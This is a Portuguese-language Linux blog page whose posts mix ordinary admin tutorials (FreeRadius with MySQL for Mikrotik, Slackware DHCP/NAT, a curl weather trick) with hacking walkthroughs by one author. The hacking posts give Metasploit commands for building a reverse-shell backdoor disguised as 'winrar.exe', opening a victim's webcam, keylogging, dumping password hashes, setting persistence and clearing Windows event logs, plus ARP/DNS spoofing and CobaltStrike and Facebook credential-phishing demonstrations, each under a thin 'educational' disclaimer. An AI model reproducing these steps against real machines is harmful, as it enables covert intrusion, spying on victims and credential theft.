Linux em Geral

Linux em Geral

Linux em todos os seus sabores

Invadindo Webcam conectada no windows com “Kali Linux”

2

Boas Users!

Reforçando>> “Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Hoje Iremos abordar como acessar, Webcam conectada a um S.O windows com o kali linux, lembrando que o video ja mostra logado no “msfconsole”, quem não sabe como fazer os passos anteriores, por favor acessem esse link que mostro como fazer.

 

Comandos usados no acesso;

use exploit/multi/handler

use exploit/multi/handler= Carregando módulo a ser usado

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp= método utilizado

set lhost

set lhost= inserir o ip do kali

set lport

set lport= inserir a porta a ser utilizada

exploit

exploit = execução do backdoor

webcam_list

webcam_list= mostra se tem alguma webcam conectada

webcam_list

webcam_stream= abre a webcam remota, localmente

 

By user777

 

Configurando Servidor FreeRadius + Mysql para PPPOE no Mikrotik(Parte 1)

0

Fala meus bons e amados irmãos de guerra, hoje vamos ver em simples passos como criar um um servidor de Radius para autenticação de usuários do mikrotik em pppoe no servidor Mysql.

 

Basicamente a estrutura se resume no seguinte.
* Essa RB ai é só pra descrever o que usei.
Rb com 5 portas, rodando RouterOs 5.25

Turnkey linux 14 baseado no Debian Jessie 8

Freeradius + Mysql
Na nossa routerboard temos 5 portas, usaremos apenas 3, uma para comunicação com o servidor radius, uma para rede de clientes e uma para conexão com a internet.

O Cenário é basicamente esse abaixo:

Radius

RB – Porta Ether1 > 10.2.2.13/28 (Internet)

RB – Porta Ether3 > 10.1.1.1/24 (Conexão com o Freeradius)

RB – Porta Ether5 > 10.2.3.1 (Com pool para Clientes PPPoE)

Linux Server – eth0 : 10.1.1.10/24

Cliente 10.2.3.150 (Endereço Já entregue pelo PPPoE após discar)

Bom, o procedimento é bem simples como descrito no vídeo, que embora um pouco longo é bem satisfatório.

 

 

Bom, basicamente é isso. O restante do conteúdo pode ser visto no vídeo.

Abraços, e vamos a parte 2

Estará disponível AQUI

 

[ x ]
 

 

 

Invadindo com CobaltStrike ( kali Linux )

2

Boas Users!

Hoje irei mostrar como acessar um computador “windows” com o CobaltStrike

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Comandos utilizados:

$ cd

cd= Navegar entre os diretórios

$ sudo ./teamserver 127.0.0.1 123456

sudo= Permissão de super usuário

./teamserver= Iniciando servidor do cobalt strike

127.0.0.1= IP LoopBack

123456= Senha

$ sudo ./cobaltstrike

./cobaltstrike= Iniciando o cobaltstrike

 

Fonte:

https://www.cobaltstrike.com/features

Softwares usados:

CobaltStrike

Toycon

Resource Hacker

 

By user777

FreeRadius Advanced Using Mysql for Mikrotik: PPPOE server + mysql ippool, login user, nas, configuration radius , control user simultaneous, Control user Mac Address and Queue in MK.

1

Fala pessoal, segunda parte do vídeo, e aqui vamos dar sequência as configurações avançadas do Freeradius.

Parte 1 Configurando Servidor Freeradius + Mysql para pppoe no Mikrotik

Neste vídeo, vamos trabalhar de forma diferente do primeiro, aliás, é interessante que você tenha visto o primeiro para que possamos entender as mudanças nas configurações em relação a ele.

Então, vejam o vídeo, no mais alguns dos comandos usados estão disponíveis logo a baixo e eu estou atualizando esse post (infelizmente estou com um problema no nervo do braço esquerdo e quase não estou conseguindo digitar, então irei atualizando calmamente isso. OK?)

 

 

 

 

Os comandos usados neste vídeo foram:

root@mysql /# mysql -uroot -pThiago123
mysql> create database radius;

mysql> grant all privileges on radius.* to radius@localhost identified by 'Thiago123'

mysql> \q
Bye

Importando as databases, ou scripts que já vem preconfigurados com o freeradius:


root@mysql /# mysql -uroot -pThiago123 radius < /etc/freeradius/sql/mysql/schema.sql
root@mysql /# mysql -uroot -pThiago123 radius < /etc/freeradius/sql/mysql/nas.sql
root@mysql /# mysql -uroot -pThiago123 radius < /etc/freeradius/sql/mysql/ippool.sql  

 



Alterar o radusergroup:

 

Alimentar as Tabelas :



 

Previsão do tempo utilizando o Curl Kali Linux

0

Boas Users!

A nível de curiosidade, irei demonstrar como saber a previsão do tempo no kali linux, bem vamos lá!

 

 

Comandos utilizados:

# curl wttr.in/:help
# curl wttr.in/saopaulo
# curl wttr.in/recife
# curl wttr.in/moon

 

Bem é isso pessoal!

 

By user777

Configurando um Servidor Slackware – DHCP server, Nat com iptables simplificado.

1

Amigos, mais uma vez é um prazer imensuravel estar por aqui e poder compartilhar um pouco do meu conhecimento com essa grande comunidade.

Vamos configurar um Slackware para servir internet e DHCP ?
O video aborda as configurações basicas necessarias para que possamos ter nosso firewall funcinando. Este video será o primeiro de uma serie que farei a respeito do sistema, então vamos lá.

 

[ x ]
 

 

Configurações usadas por mim neste video.

dnsmasq.conf:

Primeiro, faça um backup das configurações atuais.

cd /etc/

mv dnsmasq.conf dnsmasq.conf.bkp

nano dnsmasq.conf

Adicione as linhas em cinza abaixo ou crie as regras de acordo com suas necessidades.
#ARQUIVO DE CONFIGURAÇÃO DHCP SERVER
#DECLARAR ABAIXO A INTERFACE A SER USADA
interface=eth1
#<IP INICIAL>,<IP FNAL>,<MASK>.<LEASE>
dhcp-range=10.22.33.100,10.22.33.120,255.255.255.0,12h
#GATEWAY PADRÃO
dhcp-option=3,10.22.33.1
#SERVIDORES DNS
dhcp-option=6,10.22.33.1
#SERVIDOR DE NOME – SUFIXO DNS
dhcp-option=15,slack-video.prefirolinux.com
#
dhcp-authoritative

rc.firewall
Siga os comandos para a criação do script

cd /etc/rc.d

nano rc.firewall e adicione as seguintes linhas destacadas em vermelho:

#!/bin/bash
iptables -P FORWARD ACCEPT
iptables -A POSTROUTING -t nat -s 10.22.33.0/24 -o eth0 MASQUERADE

 

[ x ]
 

Ao final dos procedimentos, dar permissão de execução aos seguintes arquivos.

rc.firewall – rc.dnsmasq – rc.ip_forward

Para tal use, chmod +x <nome do script>.

Bom, isso é tudo por enquanto .

Abraços e até a proxima !!

 

Hackeando as Credenciais do facebook “setoolkit” kali linux

0

Boas Users!

Irei repassar uma forma de pegar, as credenciais do facebook com uma ferramenta chamda “setoolkit”.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Bem pessoal, essa foi uma pequena demonstração de como estamos vulneráveis, com
Participação do nosso amigo Thiago!!!!

By user777

 

 

DnsSpoof e ArpSpoof kali Linux

0

Boas Users!

Vamos falar um pouco hoje de dnsspoof e arpspoof,  técnica utilizada em redes cabeadas e wireless que permite ao atacante capturar informações

Comandos:

# arpspoof -i eth0 -t 192.168.1.119 -r 192.168.1.120
# dnsspoof -i eth0
# dnsspoof -i eth0 -f dns.txt

Isso foi uma pequena demostração  do que o dnsspoof e arpspoof é capaz de fazer.

 

By user777

 

 

Invadindo Computador com kali Linux

5

Boas Users!

Antes de mais nada um recadinho;

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

OBS: ao criar o arquivo “.exe” do backdoor, tem que ser executado no computador com  windows.

Comandos executados no video;

$ sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lport=4444
-f exe -o /root/Downloads/winrar.exe

sudo = Privilegio de super usuário, ja que eu executei os comandos como usuário comum OBS: se utilizar o usuário “root” não precisa do “sudo”

windows/meterpreter/reverse_tcp= MeterPreter é um interpretador de comandos do metasploit framework.

msfvenom= para criar o nosso backdoor

-p= Payload “refere-se à parte de um vírus de computador que executa uma ação nociva”

lhost= o seu IP local do kali

lport= porta que vai ser executada

-f= format “formato do arquivo que criamos no caso foi exe”

-o= out “saída”

/root/Downloads= caminho que salvei o arquivo

winrar.exe= nome dado ao payload, pode-se dar qualquer nome ao seu payload, mas sempre com a extensão “exe”

$ sudo msfconsole

msfconsole= iniciando o modulo do programa

use exploit/multi/handler

use exploit/multi/handler= Carregando módulo a ser usado

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp= método utilizado

set lhost

set lhost= inserir o ip do kali

set lport

set lport= inserir a porta a ser utilizada

exploit

exploit = execução do backdoor

 

Seguem-se agora algumas opções:

sysinfo – esse comando vai mostrar qual a versão do windows da máquina alvo.

getsystem – Eleva o nível de privilégio para SYSTEM

ipconfig – Mostra o endereço ip da máquina alvo

screenshot – Salva um arquivo JPEG com um print da tela do computador alvo

keyscan_start – Inicia o keylogger ou seja captura tudo que for digitado no teclado do computador alvo

keyscan_dump – Visualiza os dados capturados após o keyscan_start.

keyscan_stop – Para a captura

run persistence -X – Esse comando configura a máquina alvo para que a cada boot no sistema ela estabeleça novamente a conexão com a máquina atacante.

hashdump – faz a captura do hash de senhas do computador alvo.

execute – Executa um aplicativo ex. execute -f calc.exe

shell – Abre um prompt de comando

clearev – Limpa os logs de eventos do Windows, ou seja, apaga possíveis rastros deixados por vc.

 

By user777